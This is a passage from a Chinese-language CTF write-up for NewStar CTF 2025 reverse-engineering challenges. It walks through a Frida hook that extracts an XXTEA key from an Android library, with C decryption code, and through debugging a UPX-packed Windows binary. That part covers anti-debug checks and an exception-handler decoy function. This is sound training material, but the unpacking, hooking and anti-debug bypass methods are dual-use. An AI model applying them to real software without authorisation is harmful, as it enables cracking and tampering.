0xFFFFFFFFFFFFFFF3LL | (4 * ((v10 >> 2) & 3LL))) ^ v14) + + (v12 ^ v10)); + v12 += (((4 * v15) ^ (mm >> 5)) + ((16 * v15) ^ (mm >> 3))) ^ ((*(_DWORD *)((unsigned __int64)&v20 & 0xFFFFFFFFFFFFFFF3LL | (4LL * (((unsigned __int8)v16 ^ 1) & 3))) ^ mm) + + (v15 ^ v10)); + v15 += (((4 * v14) ^ (v12 >> 5)) + ((16 * v14) ^ (v12 >> 3))) ^ ((*(_DWORD *)((unsigned __int64)&v20 & 0xFFFFFFFFFFFFFFF3LL | (4 * ((v16 ^ 2u) & 3LL))) ^ v12) + + (v14 ^ v10)); + v18 = (*(_DWORD *)((unsigned __int64)&v20 & 0xFFFFFFFFFFFFFFF3LL | (4LL * (((unsigned __int8)v16 ^ 3) & 3))) ^ v15) + + (mm ^ v10); + v10 -= 1640531527; + v14 += (((4 * mm) ^ (v15 >> 5)) + ((16 * mm) ^ (v15 >> 3))) ^ v18; + } + while ( !v17 ); + *(_DWORD *)dest = mm; + *((_DWORD *)dest + 1) = v12; + *((_DWORD *)dest + 2) = v15; + *((_DWORD *)dest + 3) = v14; + v8 = mm == mm && unk_316C == v12 && dword_3170 == v15 && unk_3174 == v14; + free(dest); + } + return v8; +} +``` + +看起来是 `TEA` 系列算法(实际为 `XXTEA`)。`(*(_DWORD *)((unsigned __int64)&v20 & 0xFFFFFFFFFFFFFFF3LL | (4 * ((v10 >> 2) & 3LL)))` 这一处解引用操作是在取 `key`,因此可以使用 Frida 提取该值。 + +查看汇编可知,向量操作的最后一行会将 `key` 写入内存: + +```cpp +.text:0000000000000D00 20 00 00 4E TBL V0.16B, {V1.16B}, V0.16B ; Vector Table Lookup +.text:0000000000000D04 00 1C 22 6E EOR V0.16B, V0.16B, V2.16B ; Rd = Op1 ^ Op2 +.text:0000000000000D08 E0 03 80 3D STR Q0, [SP,#0x40+var_40] ; Store to Memory +``` + +使用 Frida hook,`0xd08` 是指令偏移。 + +```js +var mInterval = setInterval(function () { + var mod = Process.findModuleByName("libhookme.so"); + if (mod == null) { + console.log("无"); + return; + } + clearInterval(mInterval); + + var addr = mod.base.add(0xd08); + console.log("hook addr: " + addr); + console.log(Instruction.parse(addr).toString()); + Interceptor.attach(addr, { + onEnter: function (args) { + console.log("onEnter"); + console.log(this.context.q0); + }, + }); + //endline +}, 1); +``` + +运行 `frida -l .\hook.js -F -U` 附加 App,得到 `key`。 + +```plaintext +hook addr: 0x75447e4d08 +str q0, [sp] +[23049RAD8C::HookMe ]-> onEnter + 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF +00000000 4d 65 6f 77 6d 65 30 77 6d 65 6f 77 6d 65 30 77 Meowme0wmeowme0w +``` + +得到密钥后,即可解开后续的 `XXTEA` 加密。 + +```cpp +#include + +#define DELTA 0x9e3779b9 +#define MX (((z>>5^y<<2) + (z>>3^y<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z))) +// 容易魔改 +void btea(uint32_t * v, int n, uint32_t const key[4]) { +//v 为数据,n 为数据长度 (负时为解密),key 为密钥 + uint32_t y, z, sum; unsigned p, rounds, e; + if (n > 1) + /* Coding Part */ + { + rounds = 6 + 52 * n; + sum = 0; + z = v[n - 1]; + do { + sum += DELTA; + e = (sum >> 2) & 3; + for (p = 0; p < n - 1; p++) { + y = v[p + 1]; + z = v[p] += MX; + } + y = v[0]; + z = v[n - 1] += MX; + } while (-- rounds ); + } else if (n < -1) + /* Decoding Part */ + { + n = -n; + rounds = 6 + 52 * n; + sum = rounds * DELTA; + y = v[0]; + do { + e = (sum >> 2) & 3; + for (p = n - 1; p > 0; p--) { + z = v[p - 1]; + y = v[p] -= MX; + } + z = v[n - 1]; + y = v[0] -= MX; + sum -= DELTA; + } while (-- rounds ); + } +} +unsigned char keys[]="Meowme0wmeowme0w"; +unsigned int mm[]={0x583f7d05,0xc4e83e36,0x481c5aaa,0xa12f85e6}; +int main() +{ + btea((uint32_t*)mm,-4,(uint32_t*)keys); + unsigned char* p =mm; + for (size_t i = 0; i < 16; i++) + { + printf("%c",p[i]); + } + + return 0; +} + +``` diff --git a/docs/wp/2025/week4/reverse/upx-3.md b/docs/wp/2025/week4/reverse/upx-3.md new file mode 100644 index 0000000..5397b7e --- /dev/null +++ b/docs/wp/2025/week4/reverse/upx-3.md @@ -0,0 +1,841 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 尤皮·埃克斯历险记(3) + +本题目抹掉了更多的 UPX 特征,可以选择带壳调试/与 week1 的最初版本进行 cmp/scylla 动态调试手动脱壳,这里以带壳调试为例 + +start 指向 UPX 主函数: + +```cpp +// positive sp value has been detected, the output may be wrong! +void __fastcall sub_14000DFD0(__int64 a1, __int64 a2) +{ + // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] + + v6 = v48; + while ( 1 ) + { + while ( 1 ) + { + LOBYTE(a2) = *v5; + v7 = __CFADD__((_DWORD)v2, (_DWORD)v2); + LODWORD(v2) = 2 * v2; + if ( !(_DWORD)v2 ) + { + v8 = *(_DWORD *)v5; + v7 = (unsigned __int64)v5 < 0xFFFFFFFFFFFFFFFCuLL; + v5 += 4; + v9 = v7 + v8; + v7 = __CFADD__(v7, v8) | __CFADD__(v8, v9); + LODWORD(v2) = v8 + v9; + LOBYTE(a2) = *v5; + } + if ( !v7 ) + break; + ++v5; + *v4++ = a2; + } + do + { + v10 = v6(a1, a2); + n3 = v10 + v7 + v10; + v12 = __CFADD__((_DWORD)v2, (_DWORD)v2); + v2 = (unsigned int)(2 * v2); + if ( !(_DWORD)v2 ) + { + v13 = *(_DWORD *)v5; + v7 = (unsigned __int64)v5 < 0xFFFFFFFFFFFFFFFCuLL; + v5 += 4; + v14 = v7 + v13; + v12 = __CFADD__(v7, v13) | __CFADD__(v13, v14); + v2 = (unsigned int)(v13 + v14); + LOBYTE(a2) = *v5; + } + } + while ( !v12 ); + v7 = n3 < 3; + v15 = n3 - 3; + if ( !v7 ) + break; +LABEL_12: + v6(a1, a2); + v19 = v18(v17 + (unsigned int)v7 + v17); + LODWORD(v21) = v21 + v7 + (_DWORD)v21; + if ( !(_DWORD)v21 ) + { + v21 = v19; + do + { + v19 = v20(v21); + v21 = v22 + (unsigned int)v7 + v22; + v23 = __CFADD__((_DWORD)v2, (_DWORD)v2); + LODWORD(v2) = 2 * v2; + if ( !(_DWORD)v2 ) + { + v24 = *(_DWORD *)v5; + v7 = (unsigned __int64)v5 < 0xFFFFFFFFFFFFFFFCuLL; + v5 += 4; + v25 = v7 + v24; + v23 = __CFADD__(v7, v24) | __CFADD__(v24, v25); + LODWORD(v2) = v24 + v25; + } + } + while ( !v23 ); + } + ((void (__fastcall *)(_QWORD))sub_14000DF92)(v19 + (v3 < 0xFFFFFFFFFFFFF300uLL) + (_DWORD)v21); + } + a2 = (unsigned __int8)a2; + ++v5; + v16 = ~((unsigned __int8)a2 | (v15 << 8)); + if ( v16 ) + { + v3 = v16; + goto LABEL_12; + } + v48 = (__int64 (__fastcall *)(__int64, __int64))v2; + v26 = lpflOldProtect_[0] + 11261LL; + v27 = (_BYTE *)lpflOldProtect_[0]; + v28 = lpflOldProtect_[0]; +LABEL_28: + if ( (unsigned __int64)v27 >= v26 ) + goto LABEL_30; + n0x8F = *v27; + v30 = (unsigned int *)(v27 + 1); + while ( n0x8F == 0xE8 || n0x8F == 0xE9 ) + { + do + { + if ( (unsigned __int64)v30 >= v26 ) + { +LABEL_30: + v32 = lpflOldProtect_[0]; + v33 = (char *)(lpflOldProtect_[0] + 45056LL); + while ( 1 ) + { + v34 = *(unsigned int *)v33; + if ( !*(_DWORD *)v33 ) + break; + v35 = (FARPROC *)(v32 + *((unsigned int *)v33 + 1)); + v33 += 8; + hModule = LoadLibraryA((LPCSTR)(v34 + v32 + 57344)); + while ( 1 ) + { + v37 = *v33++; + if ( !v37 ) + break; + v38 = v33; + v39 = v33; + v40 = v37 - 1; + do + { + if ( !v38 ) + break; + v41 = *v33++ == (char)v40; + --v38; + } + while ( !v41 ); + ProcAddress = GetProcAddress(hModule, v39); + if ( !ProcAddress ) + ExitProcess(uExitCode); + *v35++ = ProcAddress; + } + } + v44 = v33 + 4; + for ( i = (unsigned __int64 *)(v32 - 4); ; *i = v32 + _byteswap_uint64(*i) ) + { + LODWORD(n0xEF) = *(unsigned __int8 *)v44; + v44 = (_WORD *)((char *)v44 + 1); + n0xEF = (unsigned int)n0xEF; + if ( !(_DWORD)n0xEF ) + break; + if ( (unsigned __int8)n0xEF > 0xEFu ) + { + LOBYTE(n0xEF) = n0xEF & 0xF; + n0xEF = (unsigned int)((_DWORD)n0xEF << 16); + LOWORD(n0xEF) = *v44++; + } + i = (unsigned __int64 *)((char *)i + n0xEF); + } + lpflOldProtect_[0] = 0; + VirtualProtect((LPVOID)(v32 - 4096), 0x1000u, 4u, (PDWORD)lpflOldProtect_); + *(_BYTE *)(v32 - 3665) &= ~0x80u; + *(_BYTE *)(v32 - 3625) &= ~0x80u; + VirtualProtect((LPVOID)(v32 - 4096), 0x1000u, lpflOldProtect_[0], (PDWORD)lpflOldProtect_); + TlsCallback_0 = -4; + ((void (__fastcall *)(__int64, __int64, _QWORD))TlsCallback_0)(v32 - 4096, 1, 0); + do + v50 = 0; + while ( &v50 != &v51 - 16 ); + JUMPOUT(0x1400013F0LL); + } + v47 = v30; + v31 = *v30; + v27 = v30 + 1; + LOBYTE(v31) = v31 - 5; + if ( !(_BYTE)v31 ) + { + *v47 = v28 + _byteswap_ulong(v31) - (_DWORD)v47; + goto LABEL_28; + } +LABEL_21: + n0x8F = *(_BYTE *)v47; + v30 = (unsigned int *)((char *)v47 + 1); + } + while ( *(_BYTE *)v47 >= 0x80u && n0x8F <= 0x8Fu && *((_BYTE *)v47 - 1) == 15 ); + } + if ( (unsigned __int64)v30 >= v26 ) + goto LABEL_30; + v47 = v30; + goto LABEL_21; +} +``` + +注意到这里有一大段赋予内存执行权限,之后是一个大跳(JUMPOUT),在这里就跳到了解压后的程序源代码,动态调试在这里下断点来到原程序的start: + +```cpp +__int64 start_0() +{ + *(_DWORD *)qword_7FF63D315480 = 0; + return sub_7FF63D311180(); +} + +__int64 sub_7FF63D311180() +{ + // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] + + v0 = (volatile signed __int64 *)off_7FF63D3154E0; + v1 = (void (__fastcall *)(__int64))qword_7FF63D3181B0[560]; + StackBase = NtCurrentTeb()->NtTib.StackBase; + while ( 1 ) + { + StackBase_1 = _InterlockedCompareExchange64(v0, (signed __int64)StackBase, 0); + if ( !StackBase_1 ) + { + v4 = off_7FF63D3154F0; + v5 = 0; + if ( *(_DWORD *)off_7FF63D3154F0 == 1 ) + goto LABEL_20; + goto LABEL_6; + } + if ( StackBase == (PVOID)StackBase_1 ) + break; + v1(1000); + } + v4 = off_7FF63D3154F0; + v5 = 1; + if ( *(_DWORD *)off_7FF63D3154F0 == 1 ) + { +LABEL_20: + sub_7FF63D3138C0(31); + if ( *v4 == 1 ) + goto LABEL_21; +LABEL_9: + if ( v5 ) + goto LABEL_10; + goto LABEL_22; + } +LABEL_6: + if ( *v4 ) + { + dword_7FF63D318008 = 1; + } + else + { + v19 = off_7FF63D315530; + *v4 = 1; + sub_7FF63D313AA0(off_7FF63D315520, v19); + } + if ( *v4 != 1 ) + goto LABEL_9; +LABEL_21: + sub_7FF63D313AA0(off_7FF63D315500, off_7FF63D315510); + *v4 = 2; + if ( v5 ) + goto LABEL_10; +LABEL_22: + _InterlockedExchange64(v0, 0); +LABEL_10: + if ( *off_7FF63D315430 ) + ((void (__fastcall *)(_QWORD, __int64, _QWORD))*off_7FF63D315430)(0, 2, 0); + sub_7FF63D312A70(); + *(_QWORD *)qword_7FF63D3154D0 = ((__int64 (__fastcall *)(__int64 (__fastcall *)()))qword_7FF63D3181B0[559])(off_7FF63D315570); + sub_7FF63D313AB0(nullsub_1); + sub_7FF63D312880(); + v6 = dword_7FF63D318028; + v7 = 8LL * (dword_7FF63D318028 + 1); + v8 = sub_7FF63D313B18(v7); + v9 = qword_7FF63D318020; + v10 = v8; + if ( v6 <= 0 ) + { + v16 = (_QWORD *)v8; + } + else + { + v11 = v7 - 8; + v12 = 0; + do + { + v13 = sub_7FF63D3139F8(*(_QWORD *)(v9 + v12)) + 1; + v14 = sub_7FF63D313B18(v13); + *(_QWORD *)(v10 + v12) = v14; + v15 = *(_QWORD *)(v9 + v12); + v12 += 8; + sub_7FF63D313AE0(v14, v15, v13); + } + while ( v11 != v12 ); + v16 = (_QWORD *)(v10 + v11); + } + *v16 = 0; + qword_7FF63D318020 = v10; + sub_7FF63D312680(); + v17 = (unsigned int)dword_7FF63D318028; + *(_QWORD *)*off_7FF63D315440 = qword_7FF63D318018; + result = sub_7FF63D3123D6(v17, qword_7FF63D318020); + dword_7FF63D318010 = result; + if ( dword_7FF63D31800C ) + { + if ( !dword_7FF63D318008 ) + { + sub_7FF63D313A68(); + return (unsigned int)dword_7FF63D318010; + } + } + else + { + sub_7FF63D313280((unsigned int)result); + *(_DWORD *)qword_7FF63D315480 = 1; + return sub_7FF63D311180(); + } + return result; +} +``` + +这里有result = xxx的就是源程序的main函数: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + FILE *Stream; // rax + FILE *Stream_1; // rax + _BYTE buf[376]; // [rsp+20h] [rbp-60h] BYREF + int v7; // [rsp+198h] [rbp+118h] + char Str[256]; // [rsp+1A0h] [rbp+120h] BYREF + char Buffer[256]; // [rsp+2A0h] [rbp+220h] BYREF + unsigned __int64 n16; // [rsp+3A0h] [rbp+320h] + size_t v11; // [rsp+3A8h] [rbp+328h] + + main_0(*(__int64 *)&argc, (__int64)argv, (__int64)envp); + memset(buf, 0, sizeof(buf)); + v7 = 0; + printf("Input your FLAG: "); + Stream = (FILE *)loc_7FF63D319458(0); + fgets(Buffer, 256, Stream); + Buffer[strcspn(Buffer, asc_7FF63D315052)] = 0;// "\n" + printf("Input your key: "); + Stream_1 = (FILE *)loc_7FF63D319458(0); + fgets(Str, 256, Stream_1); + Str[strcspn(Str, asc_7FF63D315052)] = 0; // "\n" + sub_7FF63D31154A((__int64)Str); + v11 = strlen_0(Buffer); + sub_7FF63D311648((__int64)Buffer, (__int64)Str, buf, v11); + n16 = (v11 + 2) / 3; + if ( n16 == 16 && !memcmp_0(buf, &Buf2_, 0x40u) ) + printf_0("Right FLAG!"); + else + printf_0("Wrong FLAG!"); + return 0; +} +``` + +`sub_7FF63D31154A` 是一个看起来像RC4 KSA初始化的函数: + +```cpp +size_t __fastcall sub_7FF63D31154A(const char *Buffer) +{ + n255_2 = strlen_0(Buffer); + n255_4 = n255_2; + for ( n255 = 0; n255 <= 255; ++n255 ) + { + n255_2 = n255; + byte_7FF63D318040[n255] = n255; + } + v5 = 0; + for ( n255_1 = 0; n255_1 <= 255; ++n255_1 ) + { + v5 = (byte_7FF63D318040[n255_1] + v5 + Buffer[n255_1 % n255_4]) % 256; + n255_3 = byte_7FF63D318040[n255_1]; + byte_7FF63D318040[n255_1] = byte_7FF63D318040[v5]; + n255_2 = n255_3; + byte_7FF63D318040[v5] = n255_3; + } + return n255_2; +} +``` + +而其后的“加密函数”`sub_7FF63D311648` 看起来十分诡异: + +```cpp +__int64 __fastcall sub_7FF63D311648(__int64 p_Buffer, __int64 Buffer, _BYTE *buf, unsigned __int64 a4) +{ + for ( i = 0; i < a4 >> 2; ++i ) + buf[i] = *(_BYTE *)(4 * i + 2 + p_Buffer); + v136 = 0; + v134 = 0; + n872520205 = 872520205; + for ( n114513 = 0; n114513 <= 114513; ++n114513 ) + { + v133 = 1262838809 * n114513 + n872520205; + v137 = ((v134 - v133) ^ ((v134 << 7) - 616333090) ^ ((v134 >> 2) + 1262432922)) + v136; + v135 = ((v137 + v133) ^ (32 * v137 - 1303620281) ^ ((v137 >> 3) + 230117086)) + v134; + n872520205 = v133 - 1262838809 * (n114513 - 1); + v134 = v135 - ((v137 - n872520205) ^ (4 * v137 - 1162599749) ^ ((v137 >> 4) + 1952316274)); + v136 = v137 - ((v134 + n872520205) ^ ((v134 << 6) - 1429982167) ^ ((v134 >> 1) - 1212789554)); + } + for ( n191980 = 0; n191980 <= 191980; ++n191980 ) + { + n872520205 += 1262838809 * n191980; + v136 += (v134 - n872520205) ^ (v134 << ((char)(n191980 + 1) % 5)) ^ (v134 >> ((n191980 + 4) & 7)) ^ 0xC84B6525; + v134 += (v136 - n872520205) ^ (v136 << ((char)(n191980 + 2) % 6)) ^ (v136 >> ((n191980 + 3) % 7)) ^ 0x91E894EA; + } + buf_1 = buf; + buf_2 = buf; + for ( j = 0; j < a4; ++j ) + { + *buf_1 = BYTE2(v136); + buf_1[1] = HIBYTE(v134); + buf_1[2] = v136; + v4 = buf_1 + 3; + buf_1 += 4; + *v4 = BYTE1(v134); + } + for ( k = 0; k < 4 * a4; ++k ) + { + v5 = sub_7FF63D311450((unsigned int)k); + v6 = sub_7FF63D311450((unsigned int)(k + 1)) ^ v5; + v7 = sub_7FF63D311450((unsigned int)(k + 2)) ^ v6; + v8 = sub_7FF63D311450((unsigned int)(k + 3)) ^ v7; + v9 = sub_7FF63D311450((unsigned int)(k + 4)) ^ v8; + v10 = sub_7FF63D311450((unsigned int)(k + 5)) ^ v9; + v11 = sub_7FF63D311450((unsigned int)(k + 6)) ^ v10; + v12 = sub_7FF63D311450((unsigned int)(k + 7)) ^ v11; + v13 = sub_7FF63D311450((unsigned int)(k + 8)) ^ v12; + v14 = sub_7FF63D311450((unsigned int)(k + 9)) ^ v13; + v15 = sub_7FF63D311450((unsigned int)(k + 10)) ^ v14; + v16 = sub_7FF63D311450((unsigned int)(k + 11)) ^ v15; + v17 = sub_7FF63D311450((unsigned int)(k + 12)) ^ v16; + v18 = sub_7FF63D311450((unsigned int)(k + 13)) ^ v17; + v19 = sub_7FF63D311450((unsigned int)(k + 14)) ^ v18; + v20 = sub_7FF63D311450((unsigned int)(k + 15)) ^ v19; + v21 = sub_7FF63D311450((unsigned int)(k + 16)) ^ v20; + v22 = sub_7FF63D311450((unsigned int)(k + 17)) ^ v21; + v23 = sub_7FF63D311450((unsigned int)(k + 18)) ^ v22; + v24 = sub_7FF63D311450((unsigned int)(k + 19)) ^ v23; + v25 = sub_7FF63D311450((unsigned int)(k + 20)) ^ v24; + v26 = sub_7FF63D311450((unsigned int)(k + 21)) ^ v25; + v27 = sub_7FF63D311450((unsigned int)(k + 22)) ^ v26; + v28 = sub_7FF63D311450((unsigned int)(k + 23)) ^ v27; + v29 = sub_7FF63D311450((unsigned int)(k + 24)) ^ v28; + v30 = sub_7FF63D311450((unsigned int)(k + 25)) ^ v29; + v31 = sub_7FF63D311450((unsigned int)(k + 26)) ^ v30; + v32 = sub_7FF63D311450((unsigned int)(k + 27)) ^ v31; + v33 = sub_7FF63D311450((unsigned int)(k + 28)) ^ v32; + v34 = sub_7FF63D311450((unsigned int)(k + 29)) ^ v33; + v35 = sub_7FF63D311450((unsigned int)(k + 30)) ^ v34; + v36 = sub_7FF63D311450((unsigned int)(k + 31)) ^ v35; + v37 = sub_7FF63D311450((unsigned int)(k + 32)) ^ v36; + v38 = sub_7FF63D311450((unsigned int)(k + 33)) ^ v37; + v39 = sub_7FF63D311450((unsigned int)(k + 34)) ^ v38; + v40 = sub_7FF63D311450((unsigned int)(k + 35)) ^ v39; + v41 = sub_7FF63D311450((unsigned int)(k + 36)) ^ v40; + v42 = sub_7FF63D311450((unsigned int)(k + 37)) ^ v41; + v43 = sub_7FF63D311450((unsigned int)(k + 38)) ^ v42; + v44 = sub_7FF63D311450((unsigned int)(k + 39)) ^ v43; + v45 = sub_7FF63D311450((unsigned int)(k + 40)) ^ v44; + v46 = sub_7FF63D311450((unsigned int)(k + 41)) ^ v45; + v47 = sub_7FF63D311450((unsigned int)(k + 42)) ^ v46; + v48 = sub_7FF63D311450((unsigned int)(k + 43)) ^ v47; + v49 = sub_7FF63D311450((unsigned int)(k + 44)) ^ v48; + v50 = sub_7FF63D311450((unsigned int)(k + 45)) ^ v49; + v51 = sub_7FF63D311450((unsigned int)(k + 46)) ^ v50; + v52 = sub_7FF63D311450((unsigned int)(k + 47)) ^ v51; + v53 = sub_7FF63D311450((unsigned int)(k + 48)) ^ v52; + v54 = sub_7FF63D311450((unsigned int)(k + 49)) ^ v53; + v55 = sub_7FF63D311450((unsigned int)(k + 50)) ^ v54; + v56 = sub_7FF63D311450((unsigned int)(k + 51)) ^ v55; + v57 = sub_7FF63D311450((unsigned int)(k + 52)) ^ v56; + v58 = sub_7FF63D311450((unsigned int)(k + 53)) ^ v57; + v59 = sub_7FF63D311450((unsigned int)(k + 54)) ^ v58; + v60 = sub_7FF63D311450((unsigned int)(k + 55)) ^ v59; + v61 = sub_7FF63D311450((unsigned int)(k + 56)) ^ v60; + v62 = sub_7FF63D311450((unsigned int)(k + 57)) ^ v61; + v63 = sub_7FF63D311450((unsigned int)(k + 58)) ^ v62; + v64 = sub_7FF63D311450((unsigned int)(k + 59)) ^ v63; + v65 = sub_7FF63D311450((unsigned int)(k + 60)) ^ v64; + v66 = sub_7FF63D311450((unsigned int)(k + 61)) ^ v65; + v67 = sub_7FF63D311450((unsigned int)(k + 62)) ^ v66; + v68 = sub_7FF63D311450((unsigned int)(k + 63)) ^ v67; + v69 = sub_7FF63D311450((unsigned int)(k + 64)) ^ v68; + v70 = sub_7FF63D311450((unsigned int)(k + 65)) ^ v69; + v71 = sub_7FF63D311450((unsigned int)(k + 66)) ^ v70; + v72 = sub_7FF63D311450((unsigned int)(k + 67)) ^ v71; + v73 = sub_7FF63D311450((unsigned int)(k + 68)) ^ v72; + v74 = sub_7FF63D311450((unsigned int)(k + 69)) ^ v73; + v75 = sub_7FF63D311450((unsigned int)(k + 70)) ^ v74; + v76 = sub_7FF63D311450((unsigned int)(k + 71)) ^ v75; + v77 = sub_7FF63D311450((unsigned int)(k + 72)) ^ v76; + v78 = sub_7FF63D311450((unsigned int)(k + 73)) ^ v77; + v79 = sub_7FF63D311450((unsigned int)(k + 74)) ^ v78; + v80 = sub_7FF63D311450((unsigned int)(k + 75)) ^ v79; + v81 = sub_7FF63D311450((unsigned int)(k + 76)) ^ v80; + v82 = sub_7FF63D311450((unsigned int)(k + 77)) ^ v81; + v83 = sub_7FF63D311450((unsigned int)(k + 78)) ^ v82; + v84 = sub_7FF63D311450((unsigned int)(k + 79)) ^ v83; + v85 = sub_7FF63D311450((unsigned int)(k + 80)) ^ v84; + v86 = sub_7FF63D311450((unsigned int)(k + 81)) ^ v85; + v87 = sub_7FF63D311450((unsigned int)(k + 82)) ^ v86; + v88 = sub_7FF63D311450((unsigned int)(k + 83)) ^ v87; + v89 = sub_7FF63D311450((unsigned int)(k + 84)) ^ v88; + v90 = sub_7FF63D311450((unsigned int)(k + 85)) ^ v89; + v91 = sub_7FF63D311450((unsigned int)(k + 86)) ^ v90; + v92 = sub_7FF63D311450((unsigned int)(k + 87)) ^ v91; + v93 = sub_7FF63D311450((unsigned int)(k + 88)) ^ v92; + v94 = sub_7FF63D311450((unsigned int)(k + 89)) ^ v93; + v95 = sub_7FF63D311450((unsigned int)(k + 90)) ^ v94; + v96 = sub_7FF63D311450((unsigned int)(k + 91)) ^ v95; + v97 = sub_7FF63D311450((unsigned int)(k + 92)) ^ v96; + v98 = sub_7FF63D311450((unsigned int)(k + 93)) ^ v97; + v99 = sub_7FF63D311450((unsigned int)(k + 94)) ^ v98; + v100 = sub_7FF63D311450((unsigned int)(k + 95)) ^ v99; + v101 = sub_7FF63D311450((unsigned int)(k + 96)) ^ v100; + v102 = sub_7FF63D311450((unsigned int)(k + 97)) ^ v101; + v103 = sub_7FF63D311450((unsigned int)(k + 98)) ^ v102; + v104 = sub_7FF63D311450((unsigned int)(k + 99)) ^ v103; + v105 = sub_7FF63D311450((unsigned int)(k + 100)) ^ v104; + v106 = sub_7FF63D311450((unsigned int)(k + 101)) ^ v105; + v107 = sub_7FF63D311450((unsigned int)(k + 102)) ^ v106; + v108 = sub_7FF63D311450((unsigned int)(k + 103)) ^ v107; + v109 = sub_7FF63D311450((unsigned int)(k + 104)) ^ v108; + v110 = sub_7FF63D311450((unsigned int)(k + 105)) ^ v109; + v111 = sub_7FF63D311450((unsigned int)(k + 106)) ^ v110; + v112 = sub_7FF63D311450((unsigned int)(k + 107)) ^ v111; + v113 = sub_7FF63D311450((unsigned int)(k + 108)) ^ v112; + v114 = sub_7FF63D311450((unsigned int)(k + 109)) ^ v113; + v115 = sub_7FF63D311450((unsigned int)(k + 110)) ^ v114; + v116 = sub_7FF63D311450((unsigned int)(k + 111)) ^ v115; + v117 = sub_7FF63D311450((unsigned int)(k + 112)) ^ v116; + v118 = sub_7FF63D311450((unsigned int)(k + 113)) ^ v117; + v119 = v118 ^ sub_7FF63D311450((unsigned int)(k + 114)); + v123 = (1 - main(argc, argv, envp)) * v119; + v124 = buf_2++; + *v124 ^= v123; + } + return 0; +} +``` + +不仅十分复杂,且变量设置和运算都不合理,甚至最后还出现了main函数,动态调试发现运行到 `sub_7FF63D311648` 中时会触发除零异常,检查汇编: + +```asm +seg035:00007FF63D311648 push rbp +seg035:00007FF63D311649 push rbx +seg035:00007FF63D31164A sub rsp, 78h +seg035:00007FF63D31164E lea rbp, [rsp+70h] +seg035:00007FF63D311653 mov [rbp+10h+arg_0], rcx +seg035:00007FF63D311657 mov [rbp+10h+arg_8], rdx +seg035:00007FF63D31165B mov [rbp+10h+arg_10], r8 +seg035:00007FF63D31165F mov [rbp+10h+arg_18], r9 +seg035:00007FF63D311663 xor eax, eax +seg035:00007FF63D311665 div eax +seg035:00007FF63D311667 mov rax, [rbp+10h+arg_18] +seg035:00007FF63D31166B shr rax, 2 +seg035:00007FF63D31166F mov [rbp+10h+var_58], rax +seg035:00007FF63D311673 mov [rbp+10h+var_18], 0 +seg035:00007FF63D31167B jmp short loc_7FF63D3116A5 +``` + +发现确实存在除零异常,那么这个函数应该是一个垃圾函数,程序中应当有异常处理逻辑来处理这个异常,查看初始化构造函数main_0: + +```cpp +__int64 __fastcall main_0(__int64 argc, __int64 argv, __int64 envp) +{ + __int64 result; // rax + + result = (unsigned int)dword_7FF63D318160; + if ( !dword_7FF63D318160 ) + { + dword_7FF63D318160 = 1; + return sub_7FF63D312600(argc, argv, envp); + } + return result; +} + +__int64 __fastcall sub_7FF63D312600(__int64 argc, __int64 argv, __int64 envp) +{ + void *v3; // rdx + unsigned int v4; // ecx + __int64 v5; // rax + __int64 v6; // rcx + void (__fastcall **v7)(__int64, void *, __int64); // rbx + void (__fastcall **v8)(__int64, void *, __int64); // rsi + unsigned int envp_1; // eax + + v3 = off_7FF63D3153F0; + v4 = *(_QWORD *)off_7FF63D3153F0; + if ( v4 == -1 ) + { + envp_1 = 0; + do + { + v4 = envp_1++; + envp = envp_1; + } + while ( *((_QWORD *)off_7FF63D3153F0 + envp_1) ); + } + if ( v4 ) + { + v5 = v4; + v6 = v4 - 1; + v7 = (void (__fastcall **)(__int64, void *, __int64))((char *)off_7FF63D3153F0 + 8 * v5); + v8 = (void (__fastcall **)(__int64, void *, __int64))((char *)off_7FF63D3153F0 + 8 * (v5 - v6) - 8); + do + (*v7--)(v6, v3, envp); + while ( v7 != v8 ); + } + return sub_7FF63D311410((__int64)sub_7FF63D3125C0, (__int64)v3, envp); +} +``` + +off_7FF63D3153F0指向构造函数表qword_7FF63D3155F0: + +```asm +seg035:00007FF63D3155F0 qword_7FF63D3155F0 dq 0FFFFFFFFFFFFFFFFh +seg035:00007FF63D3155F0 ; DATA XREF: seg035:off_7FF63D3153F0↑o +seg035:00007FF63D3155F0 ; seg035:off_7FF63D315410↑o ... +seg035:00007FF63D3155F8 dq offset sub_7FF63D3122F8 +seg035:00007FF63D315600 dq offset sub_7FF63D313B90 +``` + +查看第一个函数: + +```cpp +_BYTE *sub_7FF63D3122F8() +{ + _BYTE *BeingDebugged; // rax + _BYTE *p_sub_7FF63D311648; // [rsp+48h] [rbp-8h] + + BeingDebugged = (_BYTE *)NtCurrentTeb()->ProcessEnvironmentBlock->BeingDebugged; + if ( !(_BYTE)BeingDebugged ) + { + qword_7FF63D318140 = off_7FF63D3192F0(1, sub_7FF63D3121C5); + srand(0x93E71989); + for ( p_sub_7FF63D311648 = sub_7FF63D311648; ; ++p_sub_7FF63D311648 ) + { + BeingDebugged = (char *)&loc_7FF63D312648 - 4; + if ( p_sub_7FF63D311648 >= (_BYTE *)&loc_7FF63D312648 - 4 ) + break; + if ( *p_sub_7FF63D311648 == 65 + && p_sub_7FF63D311648[1] == 66 + && p_sub_7FF63D311648[2] == 67 + && p_sub_7FF63D311648[3] == 68 ) + { + BeingDebugged = p_sub_7FF63D311648 + 4; + qword_7FF63D318150 = (__int64)(p_sub_7FF63D311648 + 4); + return BeingDebugged; + } + } + } + return BeingDebugged; +} +``` + +发现含有反调试,且含有srand,检查其中的函数: + +```cpp +__int64 __fastcall sub_7FF63D3121C5(__int64 a1) +{ + __int64 v2; // [rsp+38h] [rbp-28h] + __int64 v3; // [rsp+40h] [rbp-20h] + __int64 v4; // [rsp+48h] [rbp-18h] + _QWORD *v5; // [rsp+50h] [rbp-10h] + + v5 = *(_QWORD **)(a1 + 8); + if ( **(_DWORD **)a1 != 0xC0000094 ) + return 0; + if ( _InterlockedCompareExchange((volatile signed __int32 *)&unk_7FF63D318148, 1, 0) ) + return 0; + v4 = v5[16]; + v3 = v5[17]; + v2 = v5[23]; + if ( !v4 || !v3 || !v2 ) + return 0; + sub_7FF63D3120C9(v4, v3, v2, v5[24]); + if ( qword_7FF63D318150 ) + v5[31] = 